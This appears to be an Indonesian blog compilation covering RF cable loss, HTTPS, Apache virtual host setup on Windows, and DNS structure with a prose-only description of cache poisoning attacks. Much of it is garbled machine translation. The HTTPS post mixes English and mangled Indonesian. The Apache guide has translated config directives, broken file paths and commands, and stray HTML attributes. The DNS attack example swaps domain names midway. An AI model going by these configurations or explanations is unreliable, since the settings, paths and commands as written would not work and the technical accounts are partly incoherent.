welcome to My Blog!!!! mohon maaf apabila hasilnya tidak sempurna.

Cable Loss

Cable Loss adalah total insertion loss pada sistem transmisi kabel. Cable loss mencakup penyisipan Loss pada kabel transmisi, kabel jumper, konektor dan pelindung petir. loss pada VSWR / power monitor, duplexer, combiner atau filter juga dapat menybabkan cable loss. Sebagai contoh, sistem transmisi kabel untuk antena 800 MHz terpasang di ketinggian 200 ft (61 m) pada sebuah menara dapat adalah sebagai berikut:

Kabel Transmisi: 7 / 8 “Andrew LDF5-50, 1,13 dB/100 ft (3,69 dB / 100 m) @ 824 MHz
Kabel Jumper: 1 / 2 Andrew “FSJ4-50B, 3,23 dB/100 ft (10,6 dB / 100 m) @ 824 MHz


230 ft (70 m) dari kabel transmisi    = 2,60 dB
20 ft (6 m) jumper pada pemancar = 0,65 dB
10 ft (3 m) jumper pada antena = 0,32 dB
Koneksi pasang x 4 = 0,1 x 4 = 0,4 dB
Proteksi petir = 0,1 dB
Cable Loss (total loss sisipan) = 4,07 dB



Mengukur Cable Loss

Cable loss dapat diukur dengan peralatan yang sama yang digunakan untuk mengukur VSWR antena atau tingkat return loss. Sebuah Vector Network Analyzer (VNA) dengan sebuah mode cable loss tersembung pada pengukuran ini. Cukup menghubungkan salah satu ujung kabel Anda ke VNA, tempatkan VNA secara terbuka atau pendek pada ujung kabel, dan lakukan uji Cable Loss.

Sebuah VNA dengan distance-to-fault (DTF) atau mode lokasi kesalahan secara otomatis akan mengoreksi cable loss.
Cable loss per meter atau parameter kaki dimasukkan saat pengukuran DTF. Pengaturan pertama kali, hubungkan salah satu ujung kabel ke VNA dengan antena yang terhubung pada ujung kabel dan lakukan uji DTF. Hasilnya adalah sebuah VSWR antena atau pengukuran return loss mengoreksi cable loss.

Sebuah pengukur daya juga dapat digunakan untuk menghitung cable loss. Mengukur tingkat daya pada input dan output kabel anda, mengonversi ke satuan dBm, dan menghitung perbedaannya. Sebagai contoh, input daya 100 W (50 dBm) dan output 50 W (47 dBm) menghasilkan cable loss dari 3 dB (50 dBm – 47 dBm).

Jumlahkan parameter loss sisipan untuk setiap komponen transmisi kabel Anda pada frekuensi operasi Anda. Dengan catatan, loss sisipan meningkat seiring dengan meningkatnya frekuensi.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read Comments

HTTPS

Hypertext Transfer Protocol Secure (HTTPS) adalah kombinasi dari Hypertext Transfer Protocol dengan TLS, SSL / protokol untuk menyediakan enkripsi dan identifikasi server aman. It uses port 443. Menggunakan port 443. . koneksi HTTPS sering digunakan untuk transaksi pembayaran pada World Wide Web dan untuk transaksi sensitif dalam sistem informasi perusahaan. HTTPS tidak harus bingung dengan Secure HTTP (S-HTTP) ditentukan dalam RFC 2660 .

  • Main idea
Bagaimana cara kerjanya .
. Gagasan utama HTTPS adalah untuk membuat saluran aman melalui jaringan tidak aman. This ensures reasonable protection from eavesdroppers and Ini menjamin perlindungan yang wajar dari penyadap dan -in-the-tengah serangan manusia , asalkan cipher suite yang memadai digunakan dan bahwa sertifikat server diverifikasi dan terpercaya.
Kepercayaan yang melekat dalam HTTPS didasarkan pada besar otoritas sertifikat yang datang pra-instal di software browser (ini setara dengan mengatakan "Saya percaya otoritas sertifikat (misalnya VeriSign / Microsoft / kepercayaan etc.) untuk memberitahu saya siapa saya harus"). Oleh karena itu sambungan HTTPS ke sebuah website dapat dipercaya jika dan hanya jika semua hal berikut ini benar:
1. Yang bertabiat pengguna perangkat lunak browser mereka benar menerapkan HTTPS dengan benar otoritas sertifikat pra-instal.
2. Pengguna mempercayai otoritas sertifikat untuk menjamin hanya untuk situs yang sah tanpa nama menyesatkan.
3. Website ini menyediakan sertifikat yang sah (sertifikat tidak sah menunjukkan peringatan di hampir semua browser), yang berarti telah ditandatangani oleh otoritas terpercaya.
4. Sertifikat dengan benar mengidentifikasi situs (misalnya mengunjungi https: / / contoh dan menerima sertifikat untuk "Contoh Inc" dan bukan hal lain [lihat di atas]).
5. Entah campur tangan melompat di Internet yang dapat dipercaya, atau pengguna trust's enkripsi lapisan protokol ( TLS atau SSL) yang bisa dipecahkan oleh seorang yg ikut mendengarkan rahasia.

  • integrasi Browser
Ketika melakukan koneksi ke sebuah situs dengan sertifikat yang tidak valid, browser lama akan hadir pengguna dengan kotak dialog yang menanyakan apakah mereka ingin untuk melanjutkan. Newer browsers display a warning across the entire window. browser yang lebih baru menampilkan peringatan di seluruh jendela. Newer browsers also prominently display the site's security information in the address bar . Browser yang lebih baru juga keamanan secara mencolok menampilkan informasi situs di address bar .
Extended validasi sertifikat hijau gilirannya bar alamat di browser yang lebih baru. ebanyakan browser juga menampilkan peringatan kepada pengguna ketika mengunjungi sebuah situs yang berisi campuran konten dienkripsi dan tidak terenkripsi.
opining bahwa dunia yang ideal, setiap permintaan web dapat default HTTPS", telah memberikan add-on untuk Firefox browser yang tidak jadi untuk beberapa situs yang sering digunakan

Teknis
  • Perbedaan dari HTTP
Berbeda dengan HTTP URL yang dimulai dengan "http://" dan menggunakan port 80 secara default, HTTPS URL dimulai dengan "https: / /" dan menggunakan port 443 secara default.
HTTP adalah jaminan dan dikenakan man-in-the-middle dan menguping serangan yang dapat membiarkan penyerang mendapatkan akses ke website account dan informasi sensitif. HTTPS dirancang untuk menahan serangan itu dan dianggap aman terhadap serangan tersebut (dengan pengecualian versi lama usang SSL).

  • Network layers
HTTP beroperasi pada lapisan tertinggi dari Model OSI , lapisan aplikasi, tetapi protokol keamanan beroperasi pada sublapisan lebih rendah, enkripsi pesan HTTP sebelum transmisi dan mendekripsi pesan pada saat kedatangan. Strictly speaking, HTTPS is not a separate protocol, but refers to use of ordinary HTTP over an encrypted Secure Sockets Layer (SSL) or Transport Layer Security (TLS) connection. Sebenarnya, HTTPS bukan protokol yang terpisah, namun mengacu pada penggunaan biasa HTTP melalui dienkripsi Secure Socket Layer (SSL) atau Transport Layer Security (TLS) koneksi.
  • Server setup
Untuk menyiapkan web server untuk menerima koneksi HTTPS, administrator harus membuat sertifikat kunci publik untuk server web. This certificate must be signed by a trusted certificate authority. sertifikat ini harus ditandatangani oleh terpercaya otoritas sertifikat untuk browser web untuk menerimanya. Otoritas mengesahkan bahwa pemegang sertifikat memang entitas itu diklaimnya. Web browser pada umumnya didistribusikan dengan penandatanganan sertifikat otoritas sertifikat utama sehingga mereka dapat memverifikasi sertifikat yang ditandatangani oleh mereka.
Acquiring certificates
Menandatangani sertifikat otoritatif mungkin bebas atau biaya antara US $ 13 dan $ 1.500 per tahun.
Organisasi juga dapat menjalankan otoritas sertifikat mereka sendiri, terutama jika mereka bertanggung jawab untuk mensetting browser untuk mengakses situs mereka sendiri (misalnya, situs pada sebuah perusahaan intranet , atau universitas besar). Mereka dapat dengan mudah menambahkan salinan sertifikat penandatanganan mereka sendiri ke sertifikat terpercaya yang didistribusikan dengan browser.
Gunakan sebagai kontrol akses
Sistem ini juga dapat digunakan untuk klien otentikasi untuk membatasi akses ke web server untuk pengguna yang sah situs biasanya membuat sertifikat untuk setiap pengguna, sebuah sertifikat yang dimuat ke / di browser nya Biasanya, yang berisi nama dan alamat e-mail dari pengguna yang berwenang dan secara otomatis diperiksa oleh server pada masing-masing kembali untuk memverifikasi identitas pengguna, berpotensi bahkan tanpa memasukkan password.
  • In case of compromised private key
Sertifikat dapat dicabut sebelum kadaluarsa, misalnya karena kerahasiaan kunci pribadi telah diganggu. Versi yang lebih baru dari browser populer seperti Firefox , Opera , dan Internet Explorer pada Windows Vista melaksanakan Protokol Status Sertifikat Online (OCSP) untuk memverifikasi bahwa ini tidak terjadi. Browser akan mengirimkan nomor seri sertifikat kepada otoritas sertifikat atau mendelegasikan perusahaan melalui OCSP dan otoritas merespon, mengatakan browser apakah atau tidak sertifikat tersebut masih berlaku.
SSL datang dalam dua pilihan, sederhana dan saling menguntungkan.
Rasa saling lebih aman tetapi membutuhkan pengguna untuk menginstal sertifikat pribadi dalam browser mereka untuk mengotentikasi sendiri.
Apapun strategi yang digunakan (sederhana atau bersama), tingkat perlindungan sangat tergantung pada kebenaran implementasi dari browser web dan perangkat lunak server dan aktual algoritma kriptografi didukung. See list in HTTP_Secure#Main idea . Lihat daftar di HTTP_Secure # Utama ide .
SSL tidak mencegah seluruh situs dari diindeks menggunakan web crawler , dan dalam beberapa kasus, URI sumberdaya dienkripsi dapat disimpulkan hanya dengan mengetahui permintaan disadap / ukuran respon. Hal ini memungkinkan penyerang untuk memiliki akses ke yang plaintext (yang tersedia statis konten-publik), dan teks terenkripsi (dienkripsi versi isi statis), yang memungkinkan sebuah serangan kriptografi .
Karena SSL beroperasi di bawah HTTP dan tidak memiliki pengetahuan tentang tingkat protokol yang lebih tinggi, server SSL hanya dapat benar-benar menyajikan salah satu sertifikat untuk IP tertentu / kombinasi port. Ini berarti bahwa, dalam banyak kasus, tidak layak untuk menggunakan nama- berbasis virtual hosting dengan HTTPS. Sebuah solusi yang disebut Nama Server Indikasi (SNI) ada yang akan mengirimkan nama host ke server sebelum koneksi enkripsi, meskipun banyak browser lama tidak mendukung ekstensi ini. Support for SNI is available since Firefox 2, Opera 8, and Internet Explorer 7 on Windows Vista . ] Dukungan untuk SNI tersedia sejak Firefox 2, Opera 8, dan Internet Explorer 7 di Windows Vista .
Jika kontrol orangtua akan diaktifkan pada Mac OS X , situs HTTPS harus secara eksplisit diperbolehkan menggunakan Selalu Izinkan daftar
From an architectural point of view: Dari sudut pandang arsitektur:
1. An SSL connection is managed by the first front machine which initiates the SSL connection. Sambungan SSL dikelola oleh mesin depan pertama yang memulai sambungan SSL. If, for any reasons (routing, traffic optimization, etc.), Jika, untuk alasan apapun (routing, optimasi lalu lintas, dll), mesin depan bukan server aplikasi dan telah menguraikan data, solusi harus ditemukan untuk menyebarkan informasi otentikasi pengguna atau sertifikat ke server aplikasi yang perlu tahu yang akan dihubungkan.
2. For SSL with mutual authentication, the SSL session is managed by the first server which initiates the connection. Untuk SSL dengan otentikasi bersama, sesi SSL dikelola oleh server pertama yang memulai sambungan.. Dalam situasi di mana enkripsi harus disebarkan sepanjang server dirantai, manajemen sesi timeout menjadi sangat sulit untuk diterapkan.
3. Dengan saling SSL, keamanan maksimal, namun di sisi-klien, tidak ada cara untuk benar mengakhiri sambungan SSL dan putuskan pengguna kecuali dengan menunggu server sesi SSL untuk berakhir atau menutup semua aplikasi klien terkait.
4. Untuk alasan performa, isi statis biasanya dikirimkan melalui server non-crypted depan atau misalnya server terpisah tanpa SSL. As a consequence, these contents are usually not protected. Akibatnya, isi ini biasanya tidak dilindungi.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read Comments

Setting Virtual Host

Membuat virtual host di web server Apache tidak tepat topik PHP, tapi banyak pengembang PHP menggunakan web server Apache untuk menguji halaman web pada mesin perkembangan mereka.

Ada banyak informasi sekitar tentang cara melakukan ini, tapi pertama kali saya mencobanya, saya menemukan informasi yang ada untuk lebih membingungkan daripada membantu. Mudah-mudahan, halaman ini akan menyederhanakan proses sedikit. Harap dicatat bahwa ini berkaitan informasi untuk membuat sebuah virtual host di Apache pada mesin Windows untuk digunakan sebagai server pengujian setempat. Membuat virtual host untuk server produksi aktual adalah di luar lingkup artikel ini dan Anda harus lihat dokumentasi Apache resmi untuk itu.
Konfigurasi Apache

File pertama yang akan kita perlu mengedit file httpd.conf adalah Apache. Jika Anda menginstal perangkat lunak Apache menggunakan download dari situs web Apache, Anda harus memiliki item menu yang akan membuka file ini untuk mengedit. Programs->Apache HTTP Server->Configure Apache Server->Edit the Apache httpd.conf Configuration File." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">Klik Start-> Programs-> Apache HTTP Server-> Configure Apache Server> Edit File Konfigurasi Apache httpd.conf. Jika Anda tidak memiliki item start menu, mulai editor teks Anda dan buka file. Hal ini akan berada dalam sub-folder bernama conf dari folder Apache Anda. Sebagai contoh, saya di sini:

C: \ Program Files \ Apache Group \ Apache \ conf \ httpd.conf
Catatan untuk Versi Server Apache Sejak 2,2
Konfigurasi

Perhatikan bahwa Apache mengubah metode yang disukai untuk mengkonfigurasi server Apache dengan rilis Apache 2.2. Untuk versi awal dengan 2.2, konfigurasi peferred lebih modular. Membuat virtual host seperti dijelaskan di sini akan tetap bekerja dengan versi yang lebih baru, tapi untuk mengikuti pendekatan modular, pengeditan dari httpd.conf hanya untuk membuang komentar (# menghapus dari awal baris berikut:

Sertakan # conf / extra / httpd-vhosts.conf

Segala sesuatu yang lain dimasukkan dalam file httpd-vhosts.conf, yang akan ditempatkan dalam folder tambahan di bawah di bawah ini folder yang berisi httpd.conf. Seperti disebutkan, metode yang dijelaskan di sini akan tetap bekerja.
Keamanan

Versi 2.2 juga mengubah beberapa parameter konfigurasi standar keamanan. Untuk mengatur segalanya cara Anda akan membutuhkan mereka, Anda harus menambahkan blok berikut untuk baik file httpd.conf Anda, tepat di atas virtual host, atau ke file httpd-vhosts.conf:

" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">
Order Deny, Allow
Izinkan dari semua
" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">

Di atas mengasumsikan Anda menggunakan struktur direktori yang dijelaskan di bawah ini. Menyesuaikan yang diperlukan untuk mencerminkan direktori Anda yang sebenarnya.

Sekarang, untuk contoh ini, kita akan berasumsi bahwa Anda memiliki situs web Anda terletak di folder di drive C Anda disebut Situs Saya. Setiap situs web memiliki sub-folder sendiri di bawah folder itu, seperti ini:

C: Situs \ My \ Site1
C: Situs \ My \ Site2

Katakanlah juga, untuk contoh ini, bahwa domain untuk kedua situs site1.com dan site2.com. Kami akan mengatur virtual host untuk kedua situs menggunakan nama domain site1.local dan site2.local. Dengan begitu, Anda akan dapat memberitahu sekilas apakah Anda melihat situs hidup, atau situs pengujian Anda.

Pada kenyataannya, Anda dapat menghubungi domain apa saja yang Anda inginkan. Anda bisa dengan mudah nama mereka microsoft.monkeybutt dan ibm.greentambourine. Aku memilih untuk menggunakan konvensi menggunakan nama domain yang sama bersama dengan TLD. Setempat untuk menyederhanakan dan meminimalkan mengetik diperlukan untuk beralih antara situs situs hidup dan pengujian. Satu-satunya hal yang penting, dan itu benar-benar penting, adalah bahwa Anda PERNAH menggunakan, sebenarnya nyata, nama domain hidup. Jika Anda menggunakan, misalnya, site1.com untuk virtual host lokal, Anda tidak akan pernah dapat benar-benar mencapai lokasi hidup. Semua permintaan untuk situs hidup akan diarahkan kembali ke host lokal virtual Anda.

Pergi ke bagian paling bawah file httpd.conf Anda dalam editor teks. Anda harus melihat contoh dari virtual host di sana. Setiap baris dari contoh yang akan dimulai dengan octothorpe (#). Karakter octothorpe menandai baris sebagai komentar, sehingga contoh tidak dilaksanakan. Tambahkan baris berikut di bawah ini contoh bahwa:

NameVirtualHost 127.0.0.1

" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">
DocumentRoot "C: Situs \ My \ Site1"
ServerName site1.local
" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">

" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">
DocumentRoot "C: Situs \ My \ Site2"
ServerName site2.local
" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">

Simpan dan tutup file. Itu akan memberitahu semua Apache server perlu mengetahui agar untuk menampilkan halaman menggunakan nama domain site1.local dan site2.local. Satu catatan adalah bahwa, dalam contoh di atas, kami memiliki ruang di jalan. Karena itu, kita meletakkan tanda kutip di direktori dokumen root. Jika jalan tidak memiliki spasi di dalamnya, jangan kutipan jalan. Jika direktori yang digunakan untuk situs Anda adalah, untuk MySites contoh bukannya Situs saya, garis akar dokumen akan terlihat seperti ini sebagai gantinya:

DocumentRoot C: MySites \ \ Site1

Menyelesaikan masalah DNS

Jelas, jika Anda mengetik http://site1.local di browser Anda, tidak akan ditemukan oleh DNS Internet selular Anda server. Kita berikutnya akan mengedit file lain untuk bekerja di sekitar itu. File kedua Anda perlu mengedit host disebut, tanpa ekstensi file. Ini adalah sebuah sistem file Windows dan memungkinkan Anda untuk memasukkan alamat khusus untuk domain tertentu, bukan menggunakan lookup DNS. Lokasi normal untuk file ini adalah:

C: \ WINNT \ system32 \ drivers \ host \ etc

atau

C: \ Windows \ system32 \ drivers \ host \ etc

Jika Anda tidak menemukan di sana, melakukan pencarian di direktori windows Anda untuk host kata dalam nama file. File Anda ingin disebut host, tanpa ekstensi file. File yang benar akan dimulai dengan baris berikut:

# Copyright (c) 1993-1999 Microsoft Corp
#
# Ini adalah contoh HOSTS file yang digunakan oleh Microsoft TCP / IP untuk Windows.


Sekali lagi, di file ini, karakter octothorpe adalah penanda komentar. Baris yang dimulai dengan itu adalah komentar. Dalam semua kemungkinan, tidak akan ada di sana, kecuali untuk komentar. Jika ada komentar non-entri, meninggalkan mereka sendirian. Hanya pergi ke bagian bawah file, di bawah semua komentar dan setiap entri yang ada dan menambahkan dua baris berikut:

127.0.0.1 site1.local
127.0.0.1 site2.local

Itu saja yang perlu Anda lakukan di sana. Simpan dan tutup file host.

Anda hampir selesai! Satu-satunya hal tersisa yang perlu Anda lakukan adalah untuk memulai kembali server Apache. Anda perlu melakukan ini karena Apache hanya membaca berkas konfigurasi ketika pertama kali dijalankan. Programs->Apache HTTP Server->Control Apache Server->Restart." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">Klik Start-> Programs-> Apache HTTP Server Control Apache-> Server-> Restart. Jika Anda tidak memiliki item menu, buka command prompt dan ubah ke direktori Apache, dan ketik perintah berikut dan tekan Enter:

apache-w-n "Apache"-k restart

Anda akan melihat pesan seperti ini:

Layanan restart Apache.
Layanan Apache telah ulang.

Tutup jendela perintah dan memulai browser web Anda. Di bar alamat browser, ketik http://site1.local dan tekan tombol Enter. Sekarang Anda akan melihat salinan lokal Anda site1 Anda.

Ketika Anda menciptakan virtual host seperti ini, pekerjaan http://localhost default tidak akan lagi. Dalam banyak kasus, yang tidak penting. Namun, jika Anda menggunakan sesuatu seperti phpMyAdmin, Anda masih akan membutuhkannya. Solusi untuk itu adalah dengan membuat satu virtual host tambahan disebut "localhost" yang menunjuk ke folder htdocs Apache asli. Mungkin terlihat seperti ini:

" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">
DocumentRoot C: \ Apache \ htdocs
ServerName localhost
" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'">


Jangan lupa untuk menyertakan virtual host tambahan saat Anda mengedit file host Windows.

Perhatikan bahwa ada beberapa pengaturan opsional lain yang dapat Anda gunakan untuk mengkonfigurasi virtual host. Di atas hanya menggunakan dua baris dan itulah yang benar-benar diperlukan. Anda dapat membaca tentang pilihan lain di dokumentasi Apache. Perhatikan bahwa link ini adalah situs web Apache dan akan membuka jendela browser baru.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read Comments

DNS security

  • DEFINISI DNS

Sebelum Domain Name System (DNS), jaringan komputer menggunakan HOSTS

files yang berisi informasi nama komputer dan alamat IPnya. File ini dikelola terpusat

dan ditiap lokasi harus dibuat copy versi terbaru dari HOSTS files. Dengan

penambahan 1 komputer di jaringan, maka kita harus copy versi terbaru ke setiap

lokasi. Dengan peningkatan jaringan internet, hal ini makin merepotkan. Oleh karena

itu DNS merupakan solusi untuk menggantikan fungsi HOSTS files.

DNS merupakan sistem database yang terdistribusi yang digunakan untuk pencarian

nama komputer di jaringan yang menggunakan TCP/IP. DNS mempunyai kelebihan

ukuran database yang tidak terbatas dan juga mempunyai performa yang baik. DNS

merupakan aplikasi pelayanan di internet untuk menterjemahkan domain name ke

alamat IP dan juga sebaliknya. DNS dapat dianalogikan sebagai pemakaian buku

telefon dimana orang yang ingin kita hubungi, berdasarkan nama untuk

menghubunginya dan menekan nomor telefon berdasarkan nomor dari buku telefon

tersebut. Hal ini terjadi karena komputer bekerja berdasarkan angka, dan manusia

lebih cenderung bekerja berdasarkan nama. Misalkan domain name yahoo.com

mempunyai alamat IP 202.68.0.134, tentu mengingat nama komputer lebih mudah

dibandingkan dengan mengingat alamat IP.

  • STRUKTUR DNS

Domain Name Space merupakan hirarki pengelompokan domain berdasarkan nama.

Domain ditentukan berdasarkan kemampuan yang ada di struktur hirarki yang disebut

level yang terdiri dari :

• Root-Level Domains : merupakan level paling atas di hirarki yang di

ekspresikan berdasarkan periode dan dilambangkan oleh “.”.

• Top-Level Domains : berisi second-level domains dan hosts yaitu :

o com : organisasi komersial, seperti IBM (ibm.com).

o edu : institusi pendidikan, seperti U.C. Berkeley

(berkeley.edu).

o org : organisasi non profit, Electronic Frontier Foundation

(eff.org).

o net : organisasi networking, NSFNET (nsf.net).

o gov : organisasi pemerintah non militer, NASA (nasa.gov).

o mil : organisasi pemerintah militer, ARMY (army.mil).

o xx : kode negara (id:Indonesia,au:Australia)

• Second-Level Domains : berisi host dan domain lain yang disebut

subdomain. Contoh dapat dilihat pada gambar 1. Domain Wijaya, wijaya.com

mempunyai komputer server1.wijaya.com dan subdomain ws.wijaya.com.

Subdomain ws.wijaya.com juga mempunyai host client1.ws.wijaya.com.

• Host Name : domain name yang digunakan dengan host

name akan menciptakan fully qualified domain name (FQDN) untuk setiap

kompueter. Contohnya, jika terdapat fileserver1.wijaya.com, fileserver1

adalah host name dan wijaya.com adalah domain name.

  • SERVER NAMA dan ZONA

Program yang menyimpan informasi tentang domain name space disebut server nama

(name server). Server nama biasanya mempunyai informasi yang lengkap mengenai

bagian-bagian dari domain name space yang disebut zona (zone), yang biasanya

diambil dari file atau dari Server nama lainnya. Server nama mempunyai otoritas

(authority) untuk zona tersebut, dan Server nama juga dapat mempunyai otoritas

untuk banyak zona.

Perbedaan antara sebuah zona dan sebuah domain adalah penting. Semua top-level

domain, dan banyak second-level domain dibagi menjadi unit-unit yang lebih kecil.

Unit-unit tersebut disebut zona.

Gambar 2.2 Domain edu dibagi menjadi zona-zona (diambil dari

http://www.oreilly.com/catalog/dns3/chapter/ch02.html)

Pada gambar diatas domain edu dibagi menjadi zona-zona, termasuk zona

berkeley.edu, zona purdue.edu, dan zona nwu.edu. Bagian atas dari domain edu, juga

terdapat zona edu. Domain delegation seperti mendelegasikan tugas-tugas. Seorang

manajer dapat membagi proyek besar menjadi tugas-tugas yang lebih kecil dan

mendelegasikan tanggung jawab untuk tiap tugas kepada karyawan yang berbeda.

  • RESOLVERS

Resolvers merupakan client yang mengakses Server nama. Umumnya resolver

melakukan :

• Query sebuah server nama.

• Menginterpretasikan respon (dapat berupa resource record atau sebuah error).

• Mengirimkan kembali informasi kepada program yang memintanya.

Dalam BIND (Berkeley Internet Name Domain), implementasi UNIX untuk sebuah

server DNS, resolver hanya merupakan sebuah set library routines yang

menghubungkan kedalam program seperti telnet dan ftp. Bahkan hal ini bukan

merupakan proses yang terpisah dengan menggabungkan sebuah query, mengirim dan

menunggu sebuah jawaban, dan untuk mengirimkan kembali query yang tidak

mendapat jawaban.

RESOLUSI

Server nama diadaptasi dari mengambil data dari domain name space. Server nama

tidak hanya memberikan data mengenai zona-zona yang diotoritasi oleh mereka, tapi

juga mencari kedalam domain name space untuk mencari data yang tidak dalam

otoritas mereka. Proses ini disebut resolusi nama (name resolution) atau resolusi.

Root Name Server

Root Name Server mengetahui tempat server-server nama untuk tiap domain toplevel.

Dengan memberikan query mengenai sebuah nama domain, maka root name

server dapat menyediakan nama-nama dan alamat-alamat server nama dari domain

top level yang nama domainnya dicari. Dan server nama top-level dapat menyediakan

list server-server nama yang berhubungan dengan domain second-level yang nama

domainnya dicari. Tiap server nama yang diberikan query akan memberikan

informasi cara untuk mendekati jawaban yang dicari, atau juga dapat menyediakan

jawaban tersebut.

Root Name Server sangat penting dalam resolusi, maka DNS menyediakan

mekanisme – seperti caching, yang akan dibahas dibawah – untuk membantu offload

root name server. Tetapi dengan ketidakadaan dari informasi lain, resolusi harus

dimulai dari root name server. Hal ini menyebabkan root name server sangat krusial

bagi operasi DNS. Jika semua root name server internet tidak dapat dicapai dalam

kisaran waktu tertentu, semua resolusi dalam internet akan gagal. Untuk menghindari

hal ini, internet mempunyai tigabelas root name server yang tersebar pada jaringan.

Server nama lokal akan memberikan query kepada root name server untuk alamat

girigiri.gbrmpa.gov.au dan merujuk ke server nama au. Server nama lokal akan

bertanya kepada server nama au pertanyaan yang sama, dan merujuk ke server nama

gov.au. Server nama gov.au akan merujuk server nama lokal ke server nama

gbrmpa.gov.au. Terakhir, server nama lokal akan bertanya ke server nama

gbrmpa.gov.au tentang alamatnya dan mendapatkan jawabannya.

  • Mapping Alamat ke Nama

Satu fungsi yang kuran dari proses resolusi adalah menjelaskan bagaimana alamat

bisa di petakan kembali ke nama. Memetakan alamat ke nama dilakukan untuk

menghasilkan keluaran yang dapat dibaca dan lebih cepat dimengerti. Dalam DNS,

memetakan alamat ke nama tidak mudah. Data, termasuk alamat, dalam domain name

space diberi indeks. Dengan memberikan nama domain, menemukan alamat relative

mudah. Tetapi untuk menemukan nama domain dari alamat memerlukan pencarian

yang jeli kepada data pada diagram pohon tiap nama domain. Solusi terbaik adalah

menciptakan bagian dari domain name space yang menggunakan alamat-alamat

sebagai label. Dalam domain name space internet, porsi dari name space ini adalah

domain in-addr.arpa.

Titik pada domain in-addr.arpa diberi label setelah representasi dotted-octet dari

alamat IP. Domain in-addr.arpa dapat memiliki 256 subdomain yang berhubungan

dengan tiap nilai yang munghin dalam oktet pertama dalam alamat IP. Setiap

subdomain dapat mempunyai 256 subdomain lagi, berhubungan dengan nilai yang

mungkin dari oktet kedua. Terakhir, pada level keempat, terdapat record sumber yang

terhubung pada oktet terakhir yang akan memberikan nama domain lengkap dari host

atau jaringan dari alamat IP tersebut.

Perlu diperharikan bahwa saat membaca nama domain, alamat IP akan tampak

mundur karena membaca dari ujung ke akarnya. Contohnya, jika alamat IP dari

winnie.corp.hp.com adalah 15.16.192.152, maka subdomain dari in-addr.arpa nya

adalah 152.192.16.15 yang akan memetakan kembali nama domain

winnie.corp.hp.com.

  • CACHING

Proses resolusi keseluruhan terlihat sangat rumit, namun biasanya berlangsung cukup

cepat. Kemampuan yang meningkatkan kecepatan ini disebut caching. Server-server

nama akan meng-cache data-data untuk membantu meningkatkan kecepatan dari

query. Jika sebuah resolver meng-query server nama untuk data domain nama yang

diketahui oleh server nama tersebut, maka proses akan berjalan sedikit lebih cepat.

Server nama dapat meng-chace jawaban yang akan meneruskan jawaban ke resolver.

  • ATTACKING DNS

PENGERTIAN DASAR TEKNIK-TEKNIK

SERANGAN TERHADAP DNS

Server-server DNS dapat diserang dengan menggunakan beberapa teknik, yaitu :

• Serangan buffer overflow untuk mendapakan akses perintah ke server DNS

atau merubah file-file dari zona.

• Serangan penyingkapan/penyadapan informasi seperti transfer antar zona.

• Serangan Cache poisoning sehingga cache dari DNS dikontaminasi oleh

penyerang. Hal ini dilakukan dengan menggunakan prediksi ID transaksi atau

query-query recursive.

Dalam teknik cache poisoning yang akan dijabarkan dibawah ini, diasumsikan server

DNS targer adalah server BIND seperti mayoritas server DNS di internet.

CACHE POISONING MENGGUNAKAN PREDIKSI

ID TRANSAKSI

Misalkan saat sebuah klien dalam domain sa.com membuat permintaan untuk

membuka www.microsoft.com, maka akan terjadi urutan peristiwa sebagai berikut :

1. Klien akan menghubungi server DNS dan meminta membuka

www.microsoft.com. Query akan berisi informasi mengenai port UDP dari

klien, alamat IP dan sebuah ID transaksi DNS.

2. Karena server DNS klien bukan merupakan authoratative untuk domain

friendster.com akan melewati query-query recursive melalui server root DNS

di internet dan menghubungi server DNS friendster dan mendapatkan jawaban

untuk querynya.

3. Query yang berhasil ini kemudian diteruskan kembali kepada klien dan

informasi ini di cache oleh kedua server nama sa.com dan klien.

Hal-hal penting yang dapat dicatat adalah :

• Dalam langkah ketiga, klien hanya dapat menerima informasi jika server DNS

menggunakan port klien yang benar dan alamat sebagai tambahan kepada ID

transaksi DNS dalam langkah pertama. Ketiga informasi ini merupakan format

pembuktian (authentication).

• Informasi dari www.microsoft.com di cache oleh kedua klien dan server untuk

periode TTL (time to live) tertentu. Jika klien lain ingin bertanya kepada

ns1.sa.com untuk membuka www.microsoft.com selama proses TTL ini maka

server nama akan mengembalikan informasi dari cache dan tidak bertanya

kepada ns1.microsoft.com.

Perbedaan kebutuhan dibuat dalam ID transaksi yang dipakai antara klien dan server

nama dan ID transaksi antar server nama. Langkah-langkah diatas dapat disalah

gunakan oleh penyerang untuk meletakkan informasi yang salah dalam cache

nsi.jugi.com. Dalam ilustrasi dibawah ini, penyerang berusaha untuk memperkirakan

ID transaksi selama proses komunikasi antar server nama. Yang dilakukan penyerang

adalah :

• Mengirimkan permintaan resolusi dalam jumlah yang besar yang masingmasing

di spoof dengan informasi IP asal yang berbeda-beda untuk

www.microsoft.com kepada ns1.sa.com.

• ns1.sa.com akan mengirim tiap permintaan tersebut kepada server DNS dan

ns1.microsoft.com. Maka server ns1.sa.com menunggu balasan yang banyak

dari ns1.microsoft.com.

• Penyerang menggunakan proses menunggu ini untuk mengirimkan ns1.sa.com

banyak balasan dari ns1.microsoft.com. Tiap balasan yang palsu tersebut

mempunyai ID transaksi yang berbeda. Penyerang berharap untuk menebak ID

transaksi yang tepat yang digunakan oleh kedua server nama tersebut.

Jika penyerang berhasil maka informasi palsu tersebut akan disimpan dalam cache

ns1.sa.com. Hal ini merupakan serangan terhadap hubungan server nama dan server

nama yang akan mengakibatkan klien yang menggunakan server nama target akan

mendapatkan informasi yang palsu. ID transaksi BIND berada dalam kisaran 1-65535.

